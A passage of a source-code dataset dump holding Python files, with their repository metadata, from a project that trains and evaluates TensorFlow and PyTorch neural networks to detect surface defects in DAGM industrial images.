= tf.Session()\n sess.run(tf.global_variables_initializer())\n\n\n saved_graph_file = checkpoint_dir + args.load_folder_file[1] + '.meta'\n saver = tf.train.import_meta_graph(saved_graph_file)\n \n checkpoint = tf.train.get_checkpoint_state(checkpoint_dir, latest_filename=\"checkpoint_state\") \n if checkpoint and checkpoint.model_checkpoint_path:\n saver.restore(sess, checkpoint.model_checkpoint_path)\n print(\"Loaded checkpoints %s\" % checkpoint.model_checkpoint_path)\n elif False:\n raise Exception(\"Could not load checkpoints for playback\")\n\n result_images = []\n total_results = []\n for imgNo in range(nImages):\n \n# plt.imshow(images[imgNo], cmap='gray')\n# plt.show() \n \n Xs = []\n tempX = images[imgNo]/255.\n for j in range(0, height, blockH):\n for i in range(0, width, blockW): \n# print((i,i+blockW), (j,j+blockH))\n Xs.append(tempX[i:i+blockW, j:j+blockH])\n \n \n Xs = np.array(Xs, dtype=np.float32).reshape([-1, blockW * blockH * blockC])\n \n graph = tf.get_default_graph()\n training = graph.get_tensor_by_name(\"DAGM/training:0\")\n input = graph.get_tensor_by_name(\"DAGM/input:0\")\n# result_prob = graph.get_tensor_by_name(\"prob:0\") \n# Ys_prob = sess.run(result_prob, feed_dict={input:Xs, training:False})\n result = 
graph.get_tensor_by_name(\"result:0\") \n Ys = sess.run(result, feed_dict={ input:Xs, training:False}) \n \n# Ys[np.where(Ys>=6)] = 1.0\n# Ys[np.where(Ys>=6)] = 1.0\n# Ys = Ys.reshape([16,16]).T\n# \n# result_image = np.full([16, 16], 0) \n result_image = np.zeros([16,16]) \n for i in range(16):\n for j in range(16):\n classNo = Ys[j+i*16] \n if classNo>=6:\n result_image[j,i] = 1\n \n result_image = cv2.resize(result_image, (512,512), interpolation=cv2.INTER_LINEAR) # INTER_CUBIC INTER_LINEAR INTER_AREA\n result_images.append(result_image)\n \n# plt.imshow(result_image, cmap='gray')\n# plt.show() \n if imgNo==0:\n total_results = result_image\n else:\n total_results = np.concatenate((total_results, result_image), axis=1) \n \n images = np.array(images, dtype=\"float\").reshape([-1,512,512]) \n result_images = np.array(result_images, dtype=\"float\").reshape([-1,512,512]) \n# print(result_images.shape)\n plt.imshow(total_results, cmap='gray')\n plt.show()\n \n\n# print(\"Input size :\", X_np.shape)\n# print(\"Output size :\", output.shape)\n# print(\"========================================================\")\n \n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Tensorflow version :\", tf.__version__)\n \n # GPU check\n\n \n args = dotdict({\n 'isGPU' : False, #False, # True,\n 'load_folder_file': (\"DAGM_jknet1_32/\",'saved_checkpoint-0'), #(\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), # \n 'folderPathForEval': \"./DataForEval\",\n 'feature_shape' : (32,32,1),\n })\n \n \n detectDefect(args, isResultSave=True ) \n \n "
},
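The evaluation script above tiles each 512x512 image into 32x32 blocks, classifies every block, and marks blocks whose predicted class index is >= 6 as defective before upsampling the 16x16 decision grid back to full resolution. A minimal, self-contained sketch of that tiling and reconstruction logic, with hypothetical helper names and random stand-in predictions (no TensorFlow session involved):

import numpy as np
import cv2

def image_to_blocks(img, block=32):
    # split a (H, W) image into (H//block * W//block, block, block) tiles,
    # column-major to match the loop order used in detectDefect
    h, w = img.shape
    tiles = [img[i:i+block, j:j+block]
             for j in range(0, h, block)
             for i in range(0, w, block)]
    return np.stack(tiles)

def blocks_to_decision_map(class_ids, grid=16, defect_from=6, out_size=(512, 512)):
    # one predicted class per tile; defect classes start at `defect_from`;
    # the transpose mirrors the result_image[j, i] indexing in the script
    dm = (np.asarray(class_ids).reshape(grid, grid) >= defect_from).astype(np.float32)
    return cv2.resize(dm.T, out_size, interpolation=cv2.INTER_LINEAR)

img = np.random.rand(512, 512).astype(np.float32)
tiles = image_to_blocks(img)                      # (256, 32, 32)
fake_preds = np.random.randint(0, 12, len(tiles)) # stand-in for sess.run(result, ...)
print(blocks_to_decision_map(fake_preds).shape)   # (512, 512)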
{
"alpha_fraction": 0.48028749227523804,
"alphanum_fraction": 0.5061832666397095,
"avg_line_length": 56.4012336730957,
"blob_id": "e81c6cc51612ca536473ab04cad98c935aa1c005",
"content_id": "72681ae3affd796c87c54392db9a5ca48be79379",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9461,
"license_type": "permissive",
"max_line_length": 154,
"num_lines": 162,
"path": "/DAGM/DAGM_CNN_final/networks/jkcnn2.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 24 10:56:53 2017\r\n\r\n@author: Jaekyung\r\n\"\"\"\r\nimport sys, os\r\nsys.path.append(os.pardir) # parent directory\r\nimport tensorflow as tf\r\nimport numpy as np\r\n\r\n\r\ntf.set_random_seed(777) # reproducibility\r\n\r\n\r\nclass Model:\r\n \r\n def __init__(self, sess, name, learning_rate=0.0001, feature_shape=[32,32,1], lable_size=12, weight_decay_rate=1e-5):\r\n self.sess = sess\r\n self._name = name\r\n self._learning_rate = learning_rate\r\n self._feature_shape = feature_shape\r\n self._lable_size = lable_size\r\n \r\n self.kernel_regularizer = tf.contrib.layers.l2_regularizer(scale=weight_decay_rate)\r\n \r\n self._build_net()\r\n \r\n \r\n \r\n def _build_net(self): \r\n with tf.variable_scope(self._name):\r\n # dropout (keep_prob) rate 0.7~0.5 on training, but should be 1\r\n # for testing \r\n self.training = tf.placeholder(tf.bool, name=\"training\")\r\n\r\n # input place holders\r\n self.X = tf.placeholder( tf.float32, [None, self._feature_shape[0], self._feature_shape[1], self._feature_shape[2]], name=\"input\") \r\n self.Y = tf.placeholder(tf.float32, [None, self._lable_size])\r\n \r\n # Convolutional Layer #2 and Pooling Layer #2\r\n l1 = tf.layers.conv2d(inputs=self.X, filters=64, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,30,30,64) \r\n l1 = tf.layers.batch_normalization(l1, training=self.training)\r\n l1 = tf.nn.relu(l1) \r\n l1 = tf.layers.conv2d(inputs=l1, filters=64, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,30,30,64) \r\n l1 = tf.layers.batch_normalization(l1, training=self.training)\r\n l1 = tf.nn.relu(l1)\r\n \r\n out = tf.layers.max_pooling2d(inputs=l1, pool_size=[2,2], padding=\"SAME\", strides=2) # (?,8,8,64)16 \r\n# dropout1 = tf.layers.dropout(inputs=pool1, rate=0.7, training=self.training)\r\n \r\n\r\n # Convolutional Layer #2 and Pooling Layer #3\r\n out = tf.layers.conv2d(inputs=out, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=256, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.max_pooling2d(inputs=out, pool_size=[2,2], padding=\"SAME\", strides=2) # (4,4) \r\n# dropout2 = tf.layers.dropout(inputs=pool2, rate=0.7, training=self.training)\r\n \r\n \r\n \r\n # Convolutional Layer #2 and Pooling Layer #3\r\n out = tf.layers.conv2d(inputs=out, filters=512, 
kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=512, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=512, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.conv2d(inputs=out, filters=512, kernel_size=[3,3],\r\n padding=\"SAME\", activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,15,15,256) \r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out)\r\n \r\n out = tf.layers.max_pooling2d(inputs=out, pool_size=[2,2], padding=\"SAME\", strides=2) # (2,2) \r\n# dropout3 = tf.layers.dropout(inputs=pool3, rate=0.7, training=self.training)\r\n \r\n # Dense Layer with Relu ========================================================================\r\n out = tf.reshape(out, [-1, 512*4*4]) # 32-(?,4*4*128) # 60-(?,8*8*128) \r\n \r\n out = tf.layers.dense(inputs=out, units=1024, activation=None, use_bias=False,\r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer) # (?,1024)\r\n out = tf.layers.batch_normalization(out, training=self.training)\r\n out = tf.nn.relu(out) \r\n \r\n self.logits = tf.layers.dense(inputs=out, units=self._lable_size, activation=None, \r\n kernel_initializer=tf.contrib.layers.xavier_initializer(),\r\n kernel_regularizer=self.kernel_regularizer,\r\n bias_regularizer=self.kernel_regularizer) # (?,13)\r\n \r\n \r\n self.prob = tf.nn.softmax(self.logits, name=\"prob\")\r\n# self.prob_argmax = tf.argmax(self.prob, 1, name=\"prob_argmax\")\r\n self.result = tf.argmax(self.logits, 1, name=\"result\")\r\n# self.probability = tf.max(self.prob, axis=1, name='probability')\r\n \r\n # define cost/loss & optimizer\r\n self.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(\r\n logits=self.logits, labels=self.Y))\r\n optimizer = tf.train.AdamOptimizer(learning_rate=self._learning_rate)\r\n self.train_op = ''\r\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\r\n with tf.control_dependencies(update_ops):\r\n self.train_op = optimizer.minimize(self.cost, global_step=tf.train.get_global_step())\r\n\r\n correct_prediction = tf.equal(tf.argmax(self.logits, 1), tf.argmax(self.Y, 1))\r\n \r\n self.accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n def predict(self, x_test, training=False):\r\n return self.sess.run(self.prob,\r\n feed_dict={self.X: x_test, self.training: training})\r\n\r\n def get_accuracy(self, x_test, y_test, training=False):\r\n return self.sess.run(self.accuracy,\r\n feed_dict={self.X: x_test,\r\n self.Y: y_test, self.training: training})\r\n\r\n def train(self, x_data, y_data, 
training=True):\r\n return self.sess.run([self.cost, self.train_op], feed_dict={\r\n self.X: x_data, self.Y: y_data, self.training: training})\r\n"
},
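jkcnn2.py repeats the same conv -> batch-norm -> ReLU stanza many times and wires the optimizer through tf.GraphKeys.UPDATE_OPS so the batch-norm moving averages are refreshed on every training step. A condensed sketch of both patterns, using the same TF 1.x API as the file (the helper name and placeholder shapes are illustrative):

import tensorflow as tf

def conv_bn_relu(x, filters, training, reg=None):
    # one conv -> batch-norm -> ReLU stanza, as repeated throughout jkcnn2.py
    x = tf.layers.conv2d(x, filters, [3, 3], padding="SAME", use_bias=False,
                         kernel_initializer=tf.contrib.layers.xavier_initializer(),
                         kernel_regularizer=reg)
    x = tf.layers.batch_normalization(x, training=training)
    return tf.nn.relu(x)

training = tf.placeholder(tf.bool)
x = tf.placeholder(tf.float32, [None, 32, 32, 1])
out = conv_bn_relu(conv_bn_relu(x, 64, training), 64, training)
loss = tf.reduce_mean(out)

# batch-norm moving statistics live in UPDATE_OPS; without this control
# dependency they are never updated and test-time normalization drifts
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
    train_op = tf.train.AdamOptimizer(1e-4).minimize(loss)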
{
"alpha_fraction": 0.5658413767814636,
"alphanum_fraction": 0.5782999396324158,
"avg_line_length": 28.962085723876953,
"blob_id": "a77c2016d4262b5f955a03ffb123439b1dd20dd7",
"content_id": "ab773426ea714cf431d02e61525b6b339b6997d9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6341,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 211,
"path": "/DAGM/DAGM_CNN_pytorch/dagm_fcn_evaluation.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 16:38:27 2018\n\n@author: song\n\"\"\"\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 12 20:49:19 2018\n\n@author: song\n\"\"\"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue April 3 10:56:53 2018\n\nConvolutional VAriational Autoencode\n\n@author: Jaekyung Song\n\"\"\"\n\nimport sys, os\n#sys.path.append(os.pardir) # parent directory\nimport numpy as np\nimport time\nimport glob\n#from xml.etree.ElementTree import Element, SubElement, dump, ElementTree\n\nimport torch\n#import torch.nn as nn\n#import torch.optim as optim\n#import torch.nn.init as init\n#import torch.nn.functional as F\n#import torchvision.datasets as dset\n#import torchvision.transforms as transforms\n#from torch.utils.data import TensorDataset\n#from torch.utils.data import DataLoader\nfrom torch.autograd import Variable\n\n#from mpl_toolkits.mplot3d import Axes3D\n#from mpl_toolkits.mplot3d import proj3d\nimport matplotlib.pyplot as plt\n#import cv2\n\nsys.path.append(\"../../ML_utils\")\nimport JK_image\n\n\n\n#import matplotlib.animation as animation\n#from sklearn.feature_extraction import image\n#from PIL import Image\nsys.path.append(\"networks\") # parent directory\n\n\ndef numpyToTorchVariable( array, isGPU=True):\n array_torch = torch.from_numpy(array) \n if isGPU:\n array_torch = Variable(array_torch).cuda()\n else :\n array_torch = Variable(array_torch).cpu()\n return array_torch\n\ndef detectDefect( args, isResultSave=True):\n \n resultFolderPath = \"./results/\"\n if not os.path.exists(resultFolderPath):\n os.mkdir(resultFolderPath) \n modelPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + '_all.pkl'\n convParamsPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + 'convParams.pkl'\n deconvParamsPath = \"models/\"+ args.load_folder_file[0] + args.load_folder_file[1] + 'deconvParams.pkl'\n \n \n convNet = \"\"\n deconvNet = \"\" \n \n try:\n print(\"Model path :\", modelPath)\n convNet, deconvNet = torch.load(modelPath, map_location=lambda storage, location: storage)\n print(\"\\n--------\" + modelPath + \" is restored--------\\n\")\n \n# print(\"Conv parameters path :\", convParamsPath)\n# print(\"Deconv parameters path :\", deconvParamsPath)\n# convNet.load_state_dict(torch.load(convParamsPath)) # it loads only the model parameters (recommended) \n# deconvNet.load_state_dict(torch.load(deconvParamsPath)) # it loads only the model parameters (recommended)\n# print(\"\\n--------\" + convParamsPath + \" is restored--------\\n\")\n# print(\"\\n--------\" + deconvParamsPath + \" is restored--------\\n\")\n \n \n if args.isGPU:\n convNet.cuda()\n deconvNet.cuda() \n else :\n convNet.cpu()\n deconvNet.cpu() \n \n except:\n print(\"\\n--------There are no models.--------\\n\")\n pass\n \n \n convNet.eval()\n deconvNet.eval()\n \n# images = getImagesNumberOrder(args.folderPathForEval)\n images = JK_image.getImages(args.folderPathForEval)\n nImages = len(images)\n height = images[0].shape[0]\n width = images[0].shape[1] \n X_np = np.array(images, dtype=np.float32)/255.\n X_np = X_np.reshape([-1,1,height,width]) \n\n X = numpyToTorchVariable(X_np, args.isGPU)\n\n output = convNet(X)\n output = deconvNet(output) \n\n if args.isGPU:\n output = output.cpu()\n \n output = output.data.numpy()\n outImages_np = output.reshape([-1, width, height])\n \n for i in range(nImages): \n \n outputImg = outImages_np[i]\n \n # a colormap and a normalization instance\n 
cmap = plt.cm.jet\n norm = plt.Normalize(vmin=outputImg.min(), vmax=outputImg.max()) \n # map the normalized data to colors\n resultImg = cmap(norm(outputImg))\n \n if isResultSave: \n filePath = resultFolderPath + 'output%d.png' % i\n plt.imsave(filePath, outputImg, cmap='gray')\n \n filePath = resultFolderPath + 'heatmap%d.png' % i\n plt.imsave(filePath, resultImg) \n \n plt.subplot(1,3,1) \n plt.imshow(images[i], cmap='gray') \n plt.subplot(1,3,2)\n plt.imshow(outputImg, cmap='gray')\n plt.subplot(1,3,3)\n plt.imshow(resultImg)\n plt.show() \n \n print(\"Input size :\", X_np[i].shape)\n print(\"Output size :\", output[i].shape)\n print(\"========================================================\")\n \n print(\"Input size :\", X_np.shape)\n print(\"Output size :\", output.shape)\n print(\"========================================================\")\n \n \n \nclass dotdict(dict):\n def __getattr__(self, name):\n return self[name]\n\n \n\nif __name__ == '__main__': \n \n print(\"Torch version :\", torch.__version__)\n \n # GPU check\n useGPU = torch.cuda.is_available()\n \n if useGPU :\n deviceNo = torch.cuda.current_device()\n print(\"GPU_is_available.\")\n print(\"DeviceNo :\", deviceNo)\n print(torch.cuda.device(deviceNo))\n print(\"Device_count :\", torch.cuda.device_count())\n# print(torch.cuda.get_device_name(0))\n# print(\"Device_capability :\", torch.cuda.get_device_capability(deviceNo))\n# print(\"Device_max_memory :\", torch.cuda.max_memory_allocated(deviceNo))\n# print(\"Device_max_memory_cached :\", torch.cuda.max_memory_cached(deviceNo))\n \n else :\n print(\"There are no GPU.\")\n \n \n args = dotdict({\n 'isGPU' : False, #False, # True,\n 'load_folder_file': (\"DAGM_jkfcn3/\",'jkfcn3'), #(\"ForClass4_jkfcn3/\",'ForClass4_jkfcn3'), # \n 'folderPathForEval': \"./DataForEval\",\n })\n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n \n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n if useGPU==False and args.isGPU==True:\n args.isGPU = False\n print(\"GPU is not availabe.\")\n if args.isGPU==False:\n print(\"Runing by CPU\")\n \n \n detectDefect(args, isResultSave=True ) \n \n "
},
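The FCN evaluation restores both sub-networks from a single pickle with torch.load(..., map_location=lambda storage, location: storage), which remaps tensors saved on a GPU onto the CPU. A minimal round-trip sketch of that save/load convention; the toy modules and the file name are placeholders for the real conv/deconv pair and '<name>_all.pkl' checkpoint:

import torch
import torch.nn as nn

convNet = nn.Sequential(nn.Conv2d(1, 8, 3, padding=1), nn.ReLU())
deconvNet = nn.Sequential(nn.ConvTranspose2d(8, 1, 3, padding=1))

# save both networks as one object, mirroring the '_all.pkl' files in the script
torch.save((convNet, deconvNet), "pair_all.pkl")

# map_location forces storages onto the CPU even if the checkpoint
# was written from CUDA tensors, so it loads on any machine
convNet2, deconvNet2 = torch.load(
    "pair_all.pkl", map_location=lambda storage, location: storage)
convNet2.eval(); deconvNet2.eval()

x = torch.randn(1, 1, 64, 64)
print(deconvNet2(convNet2(x)).shape)  # torch.Size([1, 1, 64, 64])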
{
"alpha_fraction": 0.5107482075691223,
"alphanum_fraction": 0.5266618132591248,
"avg_line_length": 39.35157775878906,
"blob_id": "df636accc9db14ca7e879be4e2210c6a382c9f6b",
"content_id": "f1a2fe766fef023d8ca4acdda3d61b6d6d7e5c2e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 19198,
"license_type": "permissive",
"max_line_length": 159,
"num_lines": 475,
"path": "/DAGM/DAGM_CNN_final/dagmCV2.py",
"repo_name": "sjk0709/Defect-Inspection-for-DAGM",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nimport sys, os\nsys.path.append(os.pardir) # parent directory\n#import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport matplotlib.gridspec as gridspec\nfrom sklearn.feature_extraction import image\n# from PIL import Image\nimport cv2\nimport glob\nimport random\nimport struct\n\n\n# PIL_JK class includes PIL util made by JK\n\nclass Data(object):\n def __init__(self):\n self.images = np.zeros(1)\n self.labels = np.zeros(1)\n self.start_batch = 0\n self.end_batch = 0\n self.num_examples = 0\n \n def next_batch(self, batch_size):\n mini_batch = np.random.choice(len(self.images), batch_size, replace=False)\n \n# self.end_batch = self.start_batch+batch_size\n# mini_batch = np.arange(self.start_batch, self.end_batch)\n# if self.end_batch!=len(self.images):\n# self.start_batch = self.end_batch\n# else :\n# self.start_batch = 0\n \n return self.images[mini_batch], self.labels[mini_batch]\n \n\ndef genImgListWithFilename(folderpath, imgType, start, end): # input : path # output : imgList # path안의 이미지들을 리스트로 만들어준다.\n imgList = [] \n for i in range(start, end+1):\n filepath = folderpath+ '/' + str(i) + '.' + imgType \n image = cv2.imread(filepath, cv2.IMREAD_GRAYSCALE) # B, G, R \n# cv2.imshow('ddd',image)\n# cv2.waitKey(0)\n imgList.append(image) \n return imgList \n\n\ndef cvRotateImg(img, angle): \n rows = img.shape[0]\n cols = img.shape[1]\n M = cv2.getRotationMatrix2D((cols/2,rows/2),angle,1)\n image = cv2.warpAffine(img,M,(cols,rows))\n return image\n \n\n# data augmentation \ndef dataAugmentation(image):\n Xli = []\n \n verticalFlip = cv2.flip(image,1) # vertical flip \n for i in range(1, 5): \n augmentedImg1 = cvRotateImg(image, 90*i)\n augmentedImg2 = cvRotateImg(verticalFlip, 90*i)\n Xli.append(augmentedImg1) \n Xli.append(augmentedImg2) \n \n return Xli\n\nclass DAGM(object):\n \"\"\"\n \n \"\"\"\n def __init__(self, dataPath, label_format=2):\n \n self.dataPath = dataPath\n \n self.label_size = 12\n \n self.label_folder = 'Label/'\n if label_format==3:\n self.label_folder = 'Label_new/'\n \n \n self.trainInfoC1_OK, self.trainInfoC1_NG = self.getDataInformation(1, True)\n self.testInfoC1_OK, self.testInfoC1_NG = self.getDataInformation(1, False) \n self.trainInfoC2_OK, self.trainInfoC2_NG = self.getDataInformation(2, True)\n self.testInfoC2_OK, self.testInfoC2_NG = self.getDataInformation(2, False) \n self.trainInfoC3_OK, self.trainInfoC3_NG = self.getDataInformation(3, True)\n self.testInfoC3_OK, self.testInfoC3_NG = self.getDataInformation(3, False) \n self.trainInfoC4_OK, self.trainInfoC4_NG = self.getDataInformation(4, True)\n self.testInfoC4_OK, self.testInfoC4_NG = self.getDataInformation(4, False) \n self.trainInfoC5_OK, self.trainInfoC5_NG = self.getDataInformation(5, True)\n self.testInfoC5_OK, self.testInfoC5_NG = self.getDataInformation(5, False) \n self.trainInfoC6_OK, self.trainInfoC6_NG = self.getDataInformation(6, True)\n self.testInfoC6_OK, self.testInfoC6_NG = self.getDataInformation(6, False) \n\n #readFreeImg()\n self.train = Data()\n self.test = Data() \n \n \n def getDataInformation(self, classNo, isTrain):\n \n labelFolder = '/Test/Label/'\n if isTrain: \n labelFolder = '/Train/' + self.label_folder\n \n classPath = self.dataPath + '/Class' + str(classNo)\n labelsPath = classPath + labelFolder\n \n imgInfoFile = open(labelsPath+'Labels.txt', 'r') \n imgInfoBuffer = imgInfoFile.readline().split()\n OK_info = []\n NG_info = []\n for i in range(0, 575):\n 
imgInfoBuffer = imgInfoFile.readline().split()\n# print([classNo]+imgInfoBuffer)\n if imgInfoBuffer[1]=='0':\n OK_info.append([classNo]+imgInfoBuffer)\n elif imgInfoBuffer[1]=='1':\n NG_info.append([classNo]+imgInfoBuffer)\n\n return OK_info, NG_info\n \n \n \n def getBlockImages(self, blockH, blockW, nOKperClass=160, nNGperClass=160, classNoList=[1,2,3,4,5,6], label_type='image', isTrain=True):\n \n dataX = []\n dataY = []\n \n self.label_type = label_type # image, index, or array\n \n for classNo in classNoList:\n X=[]\n Y=[]\n if classNo==1:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC1_OK, self.trainInfoC1_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC1_OK, self.testInfoC1_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==2:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC2_OK, self.trainInfoC2_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC2_OK, self.testInfoC2_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==3:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC3_OK, self.trainInfoC3_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC3_OK, self.testInfoC3_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==4:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC4_OK, self.trainInfoC4_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC4_OK, self.testInfoC4_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==5:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC5_OK, self.trainInfoC5_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC5_OK, self.testInfoC5_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n elif classNo==6:\n if isTrain :\n X, Y = self.extractBlocks(classNo, self.trainInfoC6_OK, self.trainInfoC6_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n else:\n X, Y = self.extractBlocks(classNo, self.testInfoC6_OK, self.testInfoC6_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain)\n \n dataX += X\n dataY += Y\n \n dataX = np.array(dataX, dtype=np.float32)\n if self.label_type=='image' or self.label_type=='array':\n dataY = np.array(dataY, dtype=np.float32)\n elif self.label_type=='index':\n dataY = np.array(dataY, dtype=np.int32)\n \n if isTrain:\n self.train.images = dataX\n self.train.labels = dataY\n self.train.num_examples = self.train.images.shape[0]\n print(\"Train images shape :\", self.train.images.shape)\n print(\"Train labels shape :\", self.train.labels.shape)\n else :\n self.test.images = dataX\n self.test.labels = dataY\n self.test.num_examples = self.test.images.shape[0]\n print(\"Test images shape :\", self.test.images.shape)\n print(\"Test labels shape :\", self.test.labels.shape)\n \n \n \n def extractBlocks(self, classNo, dataInfo_OK, dataInfo_NG, blockW, blockH, nOKperClass, nNGperClass, isTrain=True ):\n \n X = []\n Y = []\n \n dataFolder = '/Test/'\n labelFolder = '/Test/Label/'\n if isTrain: \n dataFolder = '/Train/'\n labelFolder = '/Train/' + self.label_folder\n \n classPath = self.dataPath + '/Class' + str(classNo)\n xDataPath = classPath + dataFolder\n yDataPath = classPath + labelFolder\n \n #====== OK\n random_batch = 
np.random.choice(len(dataInfo_OK), nOKperClass, replace=False)\n nBlockPerImage = 5\n tempY = np.zeros([blockW, blockH])\n for i in random_batch:\n imgInfoBuffer = dataInfo_OK[i]\n# print(imgInfoBuffer)\n Xpath = xDataPath + imgInfoBuffer[3]\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n try :\n tempX = image.extract_patches_2d(tempX, (blockW, blockH), max_patches=nBlockPerImage) \n except:\n print(imgInfoBuffer)\n continue \n \n for j in range(nBlockPerImage):\n X.append(tempX[j]/255.)\n \n if self.label_type=='image':\n Y.append(tempY/255.)\n \n elif self.label_type=='index': \n \n if self.label_size==12:\n Y.append(classNo-1)\n elif self.label_size==13:\n Y.append(classNo)\n \n elif self.label_type=='array':\n temp = np.zeros(self.label_size)\n if self.label_size==12:\n temp[classNo-1] = 1\n elif self.label_size==13:\n temp[classNo] = 1\n Y.append(temp)\n \n #====== NG \n if nNGperClass<8:\n nNGperClass=8 \n numNGperClass = int(nNGperClass/8)\n random_batch = np.random.choice(len(dataInfo_NG), numNGperClass, replace=False)\n \n for i in random_batch:\n imgInfoBuffer = dataInfo_NG[i]\n Xpath = xDataPath + imgInfoBuffer[3]\n Ypath = yDataPath + imgInfoBuffer[5]\n tempX = cv2.imread(Xpath, cv2.IMREAD_GRAYSCALE) # B, G, R \n tempY = cv2.imread(Ypath, cv2.IMREAD_GRAYSCALE) # B, G, R \n \n try:\n tempX.shape \n tempY.shape\n except:\n print(imgInfoBuffer)\n continue\n \n w = tempX.shape[1]\n h = tempX.shape[0]\n defectPixels = []\n for y in range(h):\n for x in range(w):\n if tempY[y,x]>0:\n# print(y,x)\n defectPixels.append((y,x))\n \n choicePixels = np.random.choice(len(defectPixels), nBlockPerImage, replace=False) \n \n for j in choicePixels:\n y = int( defectPixels[j][0]-blockH/2 )\n x = int( defectPixels[j][1]-blockW/2 )\n if x<0:\n x=0\n elif x>=w-blockW:\n 